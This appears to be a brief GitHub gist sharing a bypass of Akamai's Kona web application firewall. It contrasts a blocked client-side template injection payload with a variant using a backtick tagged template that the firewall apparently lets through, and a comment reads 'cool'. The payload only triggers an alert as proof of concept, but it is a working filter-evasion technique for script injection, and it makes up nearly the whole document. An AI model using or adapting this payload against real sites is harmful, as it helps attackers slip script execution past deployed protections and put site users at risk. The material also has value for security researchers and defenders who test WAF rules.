Created
May 17, 2020 11:51
-
-
Save 0xTeles/860fd5677d92ba114118b0c1cab58b55 to your computer and use it in GitHub Desktop.
Kona (Akamai) WAF bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
akamai kona waf bypass with backtrick and client-side template injection. | |
the payload => {{constructor.constructor('alert(1)')()}} is blocked | |
but | |
the payload => {{constructor.constructor(alert`1`)()}} is not |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
cool